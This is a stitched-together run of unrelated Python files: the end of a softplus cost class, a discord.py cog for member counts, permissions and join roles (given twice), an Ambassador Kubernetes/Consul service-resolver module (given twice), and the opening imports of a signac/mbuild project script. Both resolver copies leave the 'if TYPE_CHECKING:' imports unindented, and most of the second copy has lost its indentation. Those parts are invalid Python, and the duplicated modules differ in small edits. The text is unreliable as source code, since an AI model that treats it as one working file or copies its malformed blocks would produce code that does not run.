            The cost of the reaction.
        Raises:
            ValueError: If a requested parameter is neither in rxn.data nor an
                attribute of the reaction.
        """
        values = []
        for p in self.params:
            # Prefer the reaction's data dict; fall back to a same-named attribute.
            if rxn.data and p in rxn.data:
                value = rxn.data[p]
            elif hasattr(rxn, p):
                value = getattr(rxn, p)
            else:
                raise ValueError(f"Reaction is missing parameter {p}!")
            values.append(value)
        values = np.array(values)
        total = np.dot(values, self.weights)
        return self._softplus(total, self.temp)
    @staticmethod
    def _softplus(x: float, t: float) -> float:
        # Note the fixed 273 reference in the temperature scaling factor (273/t).
        "The mathematical formula for the softplus function"
        return np.log(1 + (273 / t) * np.exp(x))
    def __repr__(self):
        # Renders as: "Softplus with parameters: key1 (w1) key2 (w2) ..."
        return (
            f"Softplus with parameters: "
            f"{' '.join([(f'{k} ({v})') for k, v in zip(self.params, self.weights)])}"
        )
|
from typing import Optional
from datetime import datetime
from collections import Counter
import discord
from discord.ext import commands
from utils.global_utils import bright_color
from utils.converters import CaseInsensitiveMember, CaseInsensitiveChannel
class GuildCog(commands.Cog, name='Server'):
    """Guild (server) utilities: join dates, member counts, permission listings,
    screenshare links, and automatic join roles."""
    def __init__(self, bot):
        self.bot = bot
    # Applies commands.guild_only() check for all methods in this cog
    async def cog_check(self, ctx):
        if ctx.guild is None:
            raise commands.NoPrivateMessage
        return True
    @commands.command()
    async def joined(self, ctx, *, member: CaseInsensitiveMember = None):
        """Looks up when a member joined the server."""
        if not member:
            member = ctx.author
        # Inner quotes must differ from the enclosing f-string quotes: reusing
        # single quotes here was a SyntaxError before Python 3.12 (PEP 701).
        await ctx.send(f'{member.display_name} joined on {member.joined_at.isoformat(" ", "seconds")}')
    @commands.command(name='members', aliases=['memcount', 'membercount'])
    async def member_count(self, ctx):
        """Returns the member count of the guild"""
        statuses = Counter(m.status for m in ctx.guild.members)
        bots = Counter(m.bot for m in ctx.guild.members)
        formatted_statuses = f'<:status_online:602811779948740627> {statuses.get(discord.Status.online, 0)}\n' \
                             f'<:status_offline:602811780053336069> {statuses.get(discord.Status.offline, 0)}\n' \
                             f'<:status_idle:602811780129095701> {statuses.get(discord.Status.idle, 0)}\n' \
                             f'<:status_dnd:602811779931701259> {statuses.get(discord.Status.dnd, 0)}'
        e = discord.Embed(color=bright_color(), timestamp=datetime.utcnow())
        e.set_author(name=f'{ctx.guild}\'s member count', icon_url=ctx.guild.icon)
        e.add_field(name='Total', value=ctx.guild.member_count)
        e.add_field(name='Humans', value=bots.get(False, 0))
        e.add_field(name='Bots', value=bots.get(True, 0))
        e.add_field(name='Status', value=formatted_statuses)
        await ctx.send(embed=e)
    @commands.command(name='channelperms', aliases=['cperms'])
    async def channel_permissions(self, ctx, channel: Optional[CaseInsensitiveChannel], *, member: CaseInsensitiveMember = None):
        """Lists permissions of a member in a particular channel.
        If no channel is provided, the current channel will be checked.
        If a member is not provided, the author will be checked."""
        member = member or ctx.author
        channel = channel or ctx.channel
        if channel.type is discord.ChannelType.text:
            voice_perms = ('priority_speaker', 'stream', 'connect', 'speak', 'mute_members', 'deafen_members',
                           'move_members', 'use_voice_activation')
            perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
                              for perm, value in channel.permissions_for(member) if perm not in voice_perms)
            # Voice permissions are always False in text channels, we will just not show them
        else:
            perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
                              for perm, value in channel.permissions_for(member))
        e = discord.Embed(title=f'Channel permissions in #{channel}:',
                          description=perms,
                          colour=member.colour)
        e.set_author(icon_url=member.display_avatar.url, name=str(member))
        e.set_footer(text=f'Channel Type: {str(channel.type).capitalize()}')
        await ctx.send(embed=e)
    @commands.command(name='perms')
    async def get_all_permissions(self, ctx, *, member: CaseInsensitiveMember = None):
        """Lists all permissions of a member.
        If a member is not provided, the author will be checked."""
        member = member or ctx.author
        perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
                          for perm, value in member.guild_permissions)
        e = discord.Embed(title='Server Permissions', description=perms, colour=member.colour)
        e.set_author(icon_url=member.display_avatar.url, name=member)
        await ctx.send(embed=e)
    @commands.command(name='sharescreen', aliases=['share', 'ss', 'video'], hidden=True)
    async def video_in_VC(self, ctx, *, channel: Optional[discord.VoiceChannel] = None):
        """Enables video call in a voice channel.
        Defaults to your current voice channel or you can specify a voice channel"""
        author = ctx.message.author
        if author.voice is None and channel is None:
            return await ctx.send('Either you did not enter a valid channel or you are not in a voice channel! <:beemad:545443640323997717>')
        if channel is None:
            channel = author.voice.channel
        link = discord.utils.escape_markdown(f'https://discordapp.com/channels/{ctx.message.guild.id}/{channel.id}/')
        name = discord.utils.escape_markdown(channel.name)
        e = discord.Embed(colour=author.color,
                          description=f"[Click here to join video session for __**{name}**__]({link})\n"
                                      f"You must be in the voice channel to use this link")
        await ctx.send(embed=e)
    @commands.command(name='shareall', hidden=True)
    async def sharescreen_all(self, ctx):
        """Returns all voice channel's video links"""
        template = f'https://discordapp.com/channels/{ctx.guild.id}/'
        links = [f'[{vc.name}]({template}{vc.id})' for vc in ctx.guild.voice_channels]
        formatted = discord.utils.escape_markdown('\n'.join(links))  # because some ppl like to have ||name|| for some reason
        e = discord.Embed(title="Video Links for all Voice Channels",
                          colour=6430916,
                          description=formatted)
        await ctx.send(embed=e)
        await ctx.send(f'You can use {ctx.prefix}share to get the link for a single voice channel or your current voice channel', delete_after=5)
    @commands.Cog.listener()
    async def on_member_join(self, member):
        # Auto-assign configured join roles (separate roles for humans and bots).
        query = '''SELECT *
                   FROM guild_config
                   WHERE id = $1'''
        config = await self.bot.pool.fetchrow(query, member.guild.id)
        if config is None:
            return
        if not member.bot:
            if config.get('human_join_role') is not None:
                try:
                    await member.add_roles(discord.Object(id=config.get('human_join_role')),
                                           reason='Auto human join role')
                except (discord.Forbidden, discord.HTTPException):
                    # Best-effort: missing permissions / API hiccups are ignored.
                    pass
        else:
            if config.get('bot_join_role') is not None:
                try:
                    await member.add_roles(discord.Object(id=config.get('bot_join_role')),
                                           reason='Auto bot join role')
                except (discord.Forbidden, discord.HTTPException):
                    pass
def setup(bot):
    # discord.py extension entry point: register this cog when the extension loads.
    bot.add_cog(GuildCog(bot))
| from typing import Optional
from datetime import datetime
from collections import Counter
import discord
from discord.ext import commands
from utils.global_utils import bright_color
from utils.converters import CaseInsensitiveMember, CaseInsensitiveChannel
class GuildCog(commands.Cog, name='Server'):
    """Guild (server) utilities: join dates, member counts, permission listings,
    screenshare links, and automatic join roles."""
    def __init__(self, bot):
        self.bot = bot
    # Applies commands.guild_only() check for all methods in this cog
    async def cog_check(self, ctx):
        if ctx.guild is None:
            raise commands.NoPrivateMessage
        return True
    @commands.command()
    async def joined(self, ctx, *, member: CaseInsensitiveMember = None):
        """Looks up when a member joined the server."""
        if not member:
            member = ctx.author
        await ctx.send(f'{member.display_name} joined on {member.joined_at.isoformat(" ", "seconds")}')
    @commands.command(name='members', aliases=['memcount', 'membercount'])
    async def member_count(self, ctx):
        """Returns the member count of the guild"""
        statuses = Counter(m.status for m in ctx.guild.members)
        bots = Counter(m.bot for m in ctx.guild.members)
        formatted_statuses = f'<:status_online:602811779948740627> {statuses.get(discord.Status.online, 0)}\n' \
                             f'<:status_offline:602811780053336069> {statuses.get(discord.Status.offline, 0)}\n' \
                             f'<:status_idle:602811780129095701> {statuses.get(discord.Status.idle, 0)}\n' \
                             f'<:status_dnd:602811779931701259> {statuses.get(discord.Status.dnd, 0)}'
        e = discord.Embed(color=bright_color(), timestamp=datetime.utcnow())
        e.set_author(name=f'{ctx.guild}\'s member count', icon_url=ctx.guild.icon)
        e.add_field(name='Total', value=ctx.guild.member_count)
        e.add_field(name='Humans', value=bots.get(False, 0))
        e.add_field(name='Bots', value=bots.get(True, 0))
        e.add_field(name='Status', value=formatted_statuses)
        await ctx.send(embed=e)
    @commands.command(name='channelperms', aliases=['cperms'])
    async def channel_permissions(self, ctx, channel: Optional[CaseInsensitiveChannel], *, member: CaseInsensitiveMember = None):
        """Lists permissions of a member in a particular channel.
        If no channel is provided, the current channel will be checked.
        If a member is not provided, the author will be checked."""
        member = member or ctx.author
        channel = channel or ctx.channel
        if channel.type is discord.ChannelType.text:
            voice_perms = ('priority_speaker', 'stream', 'connect', 'speak', 'mute_members', 'deafen_members',
                           'move_members', 'use_voice_activation')
            perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
                              for perm, value in channel.permissions_for(member) if perm not in voice_perms)
            # Voice permissions are always False in text channels, we will just not show them
        else:
            perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
                              for perm, value in channel.permissions_for(member))
        e = discord.Embed(title=f'Channel permissions in #{channel}:',
                          description=perms,
                          colour=member.colour)
        e.set_author(icon_url=member.display_avatar.url, name=str(member))
        e.set_footer(text=f'Channel Type: {str(channel.type).capitalize()}')
        await ctx.send(embed=e)
    @commands.command(name='perms')
    async def get_all_permissions(self, ctx, *, member: CaseInsensitiveMember = None):
        """Lists all permissions of a member.
        If a member is not provided, the author will be checked."""
        member = member or ctx.author
        perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
                          for perm, value in member.guild_permissions)
        e = discord.Embed(title='Server Permissions', description=perms, colour=member.colour)
        e.set_author(icon_url=member.display_avatar.url, name=member)
        await ctx.send(embed=e)
    @commands.command(name='sharescreen', aliases=['share', 'ss', 'video'], hidden=True)
    async def video_in_VC(self, ctx, *, channel: Optional[discord.VoiceChannel] = None):
        """Enables video call in a voice channel.
        Defaults to your current voice channel or you can specify a voice channel"""
        author = ctx.message.author
        if author.voice is None and channel is None:
            return await ctx.send('Either you did not enter a valid channel or you are not in a voice channel! <:beemad:545443640323997717>')
        if channel is None:
            channel = author.voice.channel
        link = discord.utils.escape_markdown(f'https://discordapp.com/channels/{ctx.message.guild.id}/{channel.id}/')
        name = discord.utils.escape_markdown(channel.name)
        e = discord.Embed(colour=author.color,
                          description=f"[Click here to join video session for __**{name}**__]({link})\n"
                                      f"You must be in the voice channel to use this link")
        await ctx.send(embed=e)
    @commands.command(name='shareall', hidden=True)
    async def sharescreen_all(self, ctx):
        """Returns all voice channel's video links"""
        template = f'https://discordapp.com/channels/{ctx.guild.id}/'
        links = [f'[{vc.name}]({template}{vc.id})' for vc in ctx.guild.voice_channels]
        formatted = discord.utils.escape_markdown('\n'.join(links))  # because some ppl like to have ||name|| for some reason
        e = discord.Embed(title="Video Links for all Voice Channels",
                          colour=6430916,
                          description=formatted)
        await ctx.send(embed=e)
        await ctx.send(f'You can use {ctx.prefix}share to get the link for a single voice channel or your current voice channel', delete_after=5)
    @commands.Cog.listener()
    async def on_member_join(self, member):
        # Auto-assign configured join roles (separate roles for humans and bots).
        query = '''SELECT *
                   FROM guild_config
                   WHERE id = $1'''
        config = await self.bot.pool.fetchrow(query, member.guild.id)
        if config is None:
            return
        if not member.bot:
            if config.get('human_join_role') is not None:
                try:
                    await member.add_roles(discord.Object(id=config.get('human_join_role')),
                                           reason='Auto human join role')
                except (discord.Forbidden, discord.HTTPException):
                    # Best-effort: missing permissions / API hiccups are ignored.
                    pass
        else:
            if config.get('bot_join_role') is not None:
                try:
                    await member.add_roles(discord.Object(id=config.get('bot_join_role')),
                                           reason='Auto bot join role')
                except (discord.Forbidden, discord.HTTPException):
                    pass
def setup(bot):
    # discord.py extension entry point: register this cog when the extension loads.
    bot.add_cog(GuildCog(bot))
|
from typing import Dict, List, Optional, Union, TYPE_CHECKING
import json
import logging
import re
import urllib.parse
from multi import multi
from ..config import Config
from ..utils import RichStatus
from .irresource import IRResource
from .irtlscontext import IRTLSContext
if TYPE_CHECKING:
from .ir import IR
from .ircluster import IRCluster
from .irbasemapping import IRBaseMapping
#############################################################################
## irserviceresolver.py -- resolve endpoints for services
##
## IRServiceResolver does the work of looking into Service data structures.
## There are, naturally, some weirdnesses.
##
## Here's the way this goes:
##
## When you create an AConf, you must hand in Service objects and Resolver
## objects. (This will generally happen by virtue of the ResourceFetcher
## finding them someplace.) There can be multiple kinds of Resolver objects
## (e.g. ConsulResolver, KubernetesEndpointResolver, etc.).
##
## When you create an IR from that AConf, the various kinds of Resolvers
## all get turned into IRServiceResolvers, and the IR uses those to handle
## the mechanics of finding the upstream endpoints for a service.
# A single resolved upstream endpoint (keys include 'ip' and 'port'; see
# _k8s_svc_resolver for an example shape).
SvcEndpoint = Dict[str, Union[int, str]]
# The full set of endpoints resolved for one service.
SvcEndpointSet = List[SvcEndpoint]
class IRServiceResolver(IRResource):
    """
    One resolver (ConsulResolver, KubernetesServiceResolver, or
    KubernetesEndpointResolver) for mapping a service name to upstream
    endpoints. Kind-specific behavior is dispatched with @multi on self.kind.
    """
    def __init__(self, ir: 'IR', aconf: Config,
                 rkey: str = "ir.resolver",
                 kind: str = "IRServiceResolver",
                 name: str = "ir.resolver",
                 location: str = "--internal--",
                 **kwargs) -> None:
        super().__init__(
            ir=ir, aconf=aconf, rkey=rkey, kind=kind, name=name,
            location=location,
            **kwargs)
    def setup(self, ir: 'IR', aconf: Config) -> bool:
        """Validate the resolver kind and record its resolve_with backend."""
        if self.kind == 'ConsulResolver':
            self.resolve_with = 'consul'
            # Consul lookups are keyed by datacenter, so it's mandatory.
            if not self.get('datacenter'):
                self.post_error("ConsulResolver is required to have a datacenter")
                return False
        elif self.kind == 'KubernetesServiceResolver':
            self.resolve_with = 'k8s'
        elif self.kind == 'KubernetesEndpointResolver':
            self.resolve_with = 'k8s'
        else:
            self.post_error(f"Resolver kind {self.kind} unknown")
            return False
        return True
    @multi
    def valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping') -> str:
        # @multi dispatch key: the resolver kind.
        del ir
        del mapping
        return self.kind
    @valid_mapping.when("KubernetesServiceResolver")
    def _k8s_svc_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
        # You're not allowed to specific a load balancer with a KubernetesServiceResolver.
        if mapping.get('load_balancer'):
            mapping.post_error('No load_balancer setting is allowed with the KubernetesServiceResolver')
            return False
        return True
    @valid_mapping.when("KubernetesEndpointResolver")
    def _k8s_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
        # There's no real validation to do here beyond what the Mapping already does.
        return True
    @valid_mapping.when("ConsulResolver")
    def _consul_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
        # Mappings using the Consul resolver can't use service names with '.', or port
        # override. We currently do this the cheap & sleazy way.
        valid = True
        if mapping.service.find('.') >= 0:
            mapping.post_error('The Consul resolver does not allow dots in service names')
            valid = False
        if mapping.service.find(':') >= 0:
            # This is not an _error_ per se -- we'll accept the mapping and just ignore the port.
            ir.aconf.post_notice('The Consul resolver does not allow overriding service port; ignoring requested port',
                                 resource=mapping)
        return valid
    @multi
    def resolve(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> str:
        # @multi dispatch key: the resolver kind.
        del ir  # silence warnings
        del cluster
        del svc_name
        del port
        return self.kind
    @resolve.when("KubernetesServiceResolver")
    def _k8s_svc_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
        # The K8s service resolver always returns a single endpoint.
        return [ {
            'ip': svc_name,
            'port': port,
            'target_kind': 'DNSname'
        } ]
    @resolve.when("KubernetesEndpointResolver")
    def _k8s_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
        # K8s service names can be 'svc' or 'svc.namespace'. Which does this look like?
        svc = svc_name
        namespace = Config.ambassador_namespace
        if '.' in svc:
            # OK, cool. Peel off the service and the namespace.
            #
            # Note that some people may use service.namespace.cluster.svc.local or
            # some such crap. The [0:2] is to restrict this to just the first two
            # elements if there are more, but still work if there are not.
            (svc, namespace) = svc.split(".", 2)[0:2]
        # Find endpoints, and try for a port match!
        return self.get_endpoints(ir, f'k8s-{svc}-{namespace}', port)
    @resolve.when("ConsulResolver")
    def _consul_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
        # For Consul, we look things up with the service name and the datacenter at present.
        # We ignore the port in the lookup (we should've already posted a warning about the port
        # being present, actually).
        return self.get_endpoints(ir, f'consul-{svc_name}-{self.datacenter}', None)
    def get_endpoints(self, ir: 'IR', key: str, port: Optional[int]) -> Optional[SvcEndpointSet]:
        """Return the endpoint set stored for key at the given port ('*' if port
        is falsy), or None (with debug/error reporting) when nothing matches."""
        # OK. Do we have a Service by this key?
        service = ir.services.get(key)
        if not service:
            self.logger.debug(f'Resolver {self.name}: {key} matches no Service')
            return None
        self.logger.debug(f'Resolver {self.name}: {key} matches {service.as_json()}')
        endpoints = service.get('endpoints')
        if not endpoints:
            self.logger.debug(f'Resolver {self.name}: {key} has no endpoints')
            return None
        # Do we have a match for the port they're asking for (y'know, if they're asking for one)?
        targets = endpoints.get(port or '*')
        if targets:
            # Yes! (The inner subscripts must use a different quote character than
            # the enclosing f-string: reusing single quotes here was a SyntaxError
            # before Python 3.12 / PEP 701.)
            tstr = ", ".join([f"{x['ip']}:{x['port']}" for x in targets])
            self.logger.debug(f'Resolver {self.name}: {key}:{port} matches {tstr}')
            return targets
        else:
            hrtype = 'Kubernetes' if (self.resolve_with == 'k8s') else self.resolve_with
            # This is ugly. We're almost certainly being called from _within_ the initialization
            # of the cluster here -- so I guess we'll report the error against the service. Sigh.
            self.ir.aconf.post_error(f'Service {service.name}: {key}:{port} matches no endpoints from {hrtype}',
                                     resource=service)
            return None
class IRServiceResolverFactory:
    """Builds IRServiceResolvers from config and backfills defaults and alias pairs."""
    @classmethod
    def load_all(cls, ir: 'IR', aconf: Config) -> None:
        """Load configured resolvers into ir, then ensure the default K8s service
        resolver, the endpoint alias pair, and the Consul alias pair all exist."""
        config_info = aconf.get_config('resolvers')
        if config_info:
            assert(len(config_info) > 0)  # really rank paranoia on my part...
            for config in config_info.values():
                cdict = config.as_dict()
                cdict['rkey'] = config.rkey
                cdict['location'] = config.location
                ir.add_resolver(IRServiceResolver(ir, aconf, **cdict))
        if not ir.get_resolver('kubernetes-service'):
            # Default the K8s service resolver.
            resolver_config = {
                'apiVersion': 'getambassador.io/v2',
                'kind': 'KubernetesServiceResolver',
                'name': 'kubernetes-service'
            }
            if Config.single_namespace:
                resolver_config['namespace'] = Config.ambassador_namespace
            ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
        # Ugh, the aliasing for the K8s and Consul endpoint resolvers is annoying.
        res_e = ir.get_resolver('endpoint')
        res_k_e = ir.get_resolver('kubernetes-endpoint')
        if not res_e and not res_k_e:
            # Neither exists. Create them from scratch.
            resolver_config = {
                'apiVersion': 'getambassador.io/v2',
                'kind': 'KubernetesEndpointResolver',
                'name': 'kubernetes-endpoint'
            }
            if Config.single_namespace:
                resolver_config['namespace'] = Config.ambassador_namespace
            ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
            # Same config, registered a second time under the alias name.
            resolver_config['name'] = 'endpoint'
            ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
        else:
            cls.check_aliases(ir, aconf, 'endpoint', res_e, 'kubernetes-endpoint', res_k_e)
        res_c = ir.get_resolver('consul')
        res_c_e = ir.get_resolver('consul-endpoint')
        if not res_c and not res_c_e:
            # Neither exists. Create them from scratch.
            resolver_config = {
                'apiVersion': 'getambassador.io/v2',
                'kind': 'ConsulResolver',
                'name': 'consul-endpoint',
                'datacenter': 'dc1'
            }
            ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
            resolver_config['name'] = 'consul'
            ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
        else:
            cls.check_aliases(ir, aconf, 'consul', res_c, 'consul-endpoint', res_c_e)
    @classmethod
    def check_aliases(cls, ir: 'IR', aconf: Config,
                      n1: str, r1: Optional[IRServiceResolver],
                      n2: str, r2: Optional[IRServiceResolver]) -> None:
        """If exactly one of an alias pair exists, clone its config under the missing name."""
        source = None
        name = None
        if not r1:
            # r2 must exist to be here.
            source = r2
            name = n1
        elif not r2:
            # r1 must exist to be here.
            source = r1
            name = n2
        if source:
            config = dict(**source.as_dict())
            # Fix up this dict. Sigh.
            config['rkey'] = config.pop('_rkey', config.get('rkey', None))  # Kludge, I know...
            config.pop('_errored', None)
            config.pop('_active', None)
            config.pop('resolve_with', None)
            config['name'] = name
            ir.add_resolver(IRServiceResolver(ir, aconf, **config))
| from typing import Dict, List, Optional, Union, TYPE_CHECKING
import json
import logging
import re
import urllib.parse
from multi import multi
from ..config import Config
from ..utils import RichStatus
from .irresource import IRResource
from .irtlscontext import IRTLSContext
if TYPE_CHECKING:
from .ir import IR
from .ircluster import IRCluster
from .irbasemapping import IRBaseMapping
#############################################################################
## irserviceresolver.py -- resolve endpoints for services
##
## IRServiceResolver does the work of looking into Service data structures.
## There are, naturally, some weirdnesses.
##
## Here's the way this goes:
##
## When you create an AConf, you must hand in Service objects and Resolver
## objects. (This will generally happen by virtue of the ResourceFetcher
## finding them someplace.) There can be multiple kinds of Resolver objects
## (e.g. ConsulResolver, KubernetesEndpointResolver, etc.).
##
## When you create an IR from that AConf, the various kinds of Resolvers
## all get turned into IRServiceResolvers, and the IR uses those to handle
## the mechanics of finding the upstream endpoints for a service.
# A single resolved upstream endpoint (keys include 'ip' and 'port'; see
# _k8s_svc_resolver for an example shape).
SvcEndpoint = Dict[str, Union[int, str]]
# The full set of endpoints resolved for one service.
SvcEndpointSet = List[SvcEndpoint]
class IRServiceResolver(IRResource):
def __init__(self, ir: 'IR', aconf: Config,
rkey: str = "ir.resolver",
kind: str = "IRServiceResolver",
name: str = "ir.resolver",
location: str = "--internal--",
**kwargs) -> None:
super().__init__(
ir=ir, aconf=aconf, rkey=rkey, kind=kind, name=name,
location=location,
**kwargs)
def setup(self, ir: 'IR', aconf: Config) -> bool:
if self.kind == 'ConsulResolver':
self.resolve_with = 'consul'
if not self.get('datacenter'):
self.post_error("ConsulResolver is required to have a datacenter")
return False
elif self.kind == 'KubernetesServiceResolver':
self.resolve_with = 'k8s'
elif self.kind == 'KubernetesEndpointResolver':
self.resolve_with = 'k8s'
else:
self.post_error(f"Resolver kind {self.kind} unknown")
return False
return True
@multi
def valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping') -> str:
del ir
del mapping
return self.kind
@valid_mapping.when("KubernetesServiceResolver")
def _k8s_svc_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
# You're not allowed to specific a load balancer with a KubernetesServiceResolver.
if mapping.get('load_balancer'):
mapping.post_error('No load_balancer setting is allowed with the KubernetesServiceResolver')
return False
return True
@valid_mapping.when("KubernetesEndpointResolver")
def _k8s_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
# There's no real validation to do here beyond what the Mapping already does.
return True
@valid_mapping.when("ConsulResolver")
def _consul_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
# Mappings using the Consul resolver can't use service names with '.', or port
# override. We currently do this the cheap & sleazy way.
valid = True
if mapping.service.find('.') >= 0:
mapping.post_error('The Consul resolver does not allow dots in service names')
valid = False
if mapping.service.find(':') >= 0:
# This is not an _error_ per se -- we'll accept the mapping and just ignore the port.
ir.aconf.post_notice('The Consul resolver does not allow overriding service port; ignoring requested port',
resource=mapping)
return valid
@multi
def resolve(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> str:
del ir # silence warnings
del cluster
del svc_name
del port
return self.kind
@resolve.when("KubernetesServiceResolver")
def _k8s_svc_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
# The K8s service resolver always returns a single endpoint.
return [ {
'ip': svc_name,
'port': port,
'target_kind': 'DNSname'
} ]
@resolve.when("KubernetesEndpointResolver")
def _k8s_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
# K8s service names can be 'svc' or 'svc.namespace'. Which does this look like?
svc = svc_name
namespace = Config.ambassador_namespace
if '.' in svc:
# OK, cool. Peel off the service and the namespace.
#
# Note that some people may use service.namespace.cluster.svc.local or
# some such crap. The [0:2] is to restrict this to just the first two
# elements if there are more, but still work if there are not.
(svc, namespace) = svc.split(".", 2)[0:2]
# Find endpoints, and try for a port match!
return self.get_endpoints(ir, f'k8s-{svc}-{namespace}', port)
@resolve.when("ConsulResolver")
def _consul_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
    # Consul lookups key on service name + datacenter only. The port is
    # ignored here (a notice about any requested port was already posted at
    # validation time).
    return self.get_endpoints(ir, f'consul-{svc_name}-{self.datacenter}', None)
def get_endpoints(self, ir: 'IR', key: str, port: Optional[int]) -> Optional[SvcEndpointSet]:
    """
    Look up the endpoint set for a Service key, optionally matching a port.

    :param ir: the IR being worked on (also used to post lookup errors)
    :param key: Service key, e.g. 'k8s-{svc}-{namespace}' or 'consul-{svc}-{dc}'
    :param port: specific port to match; None (or 0) selects the wildcard '*' set
    :return: the matching endpoint list, or None if nothing matches
    """
    # OK. Do we have a Service by this key?
    service = ir.services.get(key)

    if not service:
        self.logger.debug(f'Resolver {self.name}: {key} matches no Service')
        return None

    self.logger.debug(f'Resolver {self.name}: {key} matches {service.as_json()}')

    endpoints = service.get('endpoints')

    if not endpoints:
        self.logger.debug(f'Resolver {self.name}: {key} has no endpoints')
        return None

    # Do we have a match for the port they're asking for (y'know, if they're asking for one)?
    targets = endpoints.get(port or '*')

    if targets:
        # Yes!
        tstr = ", ".join(f'{x["ip"]}:{x["port"]}' for x in targets)
        self.logger.debug(f'Resolver {self.name}: {key}:{port} matches {tstr}')
        return targets

    hrtype = 'Kubernetes' if (self.resolve_with == 'k8s') else self.resolve_with

    # This is ugly. We're almost certainly being called from _within_ the initialization
    # of the cluster here -- so I guess we'll report the error against the service. Sigh.
    # CONSISTENCY FIX: use the 'ir' parameter (as every other reference in this
    # method does) instead of reaching through self.ir.
    ir.aconf.post_error(f'Service {service.name}: {key}:{port} matches no endpoints from {hrtype}',
                        resource=service)
    return None
class IRServiceResolverFactory:
    """Instantiates and registers IRServiceResolvers for an IR, filling in defaults."""

    @classmethod
    def load_all(cls, ir: 'IR', aconf: Config) -> None:
        """Load every configured resolver into the IR, then ensure the standard
        resolvers exist: 'kubernetes-service', the 'endpoint'/'kubernetes-endpoint'
        alias pair, and the 'consul'/'consul-endpoint' alias pair, creating
        defaults or mirroring aliases as needed.
        """
        config_info = aconf.get_config('resolvers')

        if config_info:
            assert(len(config_info) > 0)    # really rank paranoia on my part...

            for config in config_info.values():
                cdict = config.as_dict()
                # Carry source bookkeeping over into the resolver's kwargs.
                cdict['rkey'] = config.rkey
                cdict['location'] = config.location

                ir.add_resolver(IRServiceResolver(ir, aconf, **cdict))

        if not ir.get_resolver('kubernetes-service'):
            # Default the K8s service resolver.
            resolver_config = {
                'apiVersion': 'getambassador.io/v2',
                'kind': 'KubernetesServiceResolver',
                'name': 'kubernetes-service'
            }

            if Config.single_namespace:
                resolver_config['namespace'] = Config.ambassador_namespace

            ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))

        # Ugh, the aliasing for the K8s and Consul endpoint resolvers is annoying.
        res_e = ir.get_resolver('endpoint')
        res_k_e = ir.get_resolver('kubernetes-endpoint')

        if not res_e and not res_k_e:
            # Neither exists. Create them from scratch.
            resolver_config = {
                'apiVersion': 'getambassador.io/v2',
                'kind': 'KubernetesEndpointResolver',
                'name': 'kubernetes-endpoint'
            }

            if Config.single_namespace:
                resolver_config['namespace'] = Config.ambassador_namespace

            ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))

            # Same config dict, re-registered under the alias name as well.
            resolver_config['name'] = 'endpoint'
            ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
        else:
            # At least one of the pair exists; mirror it to the missing alias.
            cls.check_aliases(ir, aconf, 'endpoint', res_e, 'kubernetes-endpoint', res_k_e)

        res_c = ir.get_resolver('consul')
        res_c_e = ir.get_resolver('consul-endpoint')

        if not res_c and not res_c_e:
            # Neither exists. Create them from scratch.
            resolver_config = {
                'apiVersion': 'getambassador.io/v2',
                'kind': 'ConsulResolver',
                'name': 'consul-endpoint',
                'datacenter': 'dc1'
            }

            ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))

            resolver_config['name'] = 'consul'
            ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
        else:
            cls.check_aliases(ir, aconf, 'consul', res_c, 'consul-endpoint', res_c_e)

    @classmethod
    def check_aliases(cls, ir: 'IR', aconf: Config,
                      n1: str, r1: Optional[IRServiceResolver],
                      n2: str, r2: Optional[IRServiceResolver]) -> None:
        """Given alias names n1/n2 and whichever resolvers exist for them
        (r1/r2), clone the existing one under the missing name so both
        aliases resolve. No-op when both (or neither) exist.
        """
        source = None
        name = None

        if not r1:
            # r2 must exist to be here.
            source = r2
            name = n1
        elif not r2:
            # r1 must exist to be here.
            source = r1
            name = n2

        if source:
            config = dict(**source.as_dict())

            # Fix up this dict. Sigh.
            config['rkey'] = config.pop('_rkey', config.get('rkey', None)) # Kludge, I know...
            config.pop('_errored', None)
            config.pop('_active', None)
            config.pop('resolve_with', None)

            config['name'] = name

            ir.add_resolver(IRServiceResolver(ir, aconf, **config))
|
"""GOMC's setup for signac, signac-flow, signac-dashboard for this study."""
# project.py
import flow
# from flow.environment import StandardEnvironment
import mbuild as mb
import mbuild.formats.charmm_writer as mf_charmm
import mbuild.formats.gomc_conf_writer as gomc_control
import numpy as np
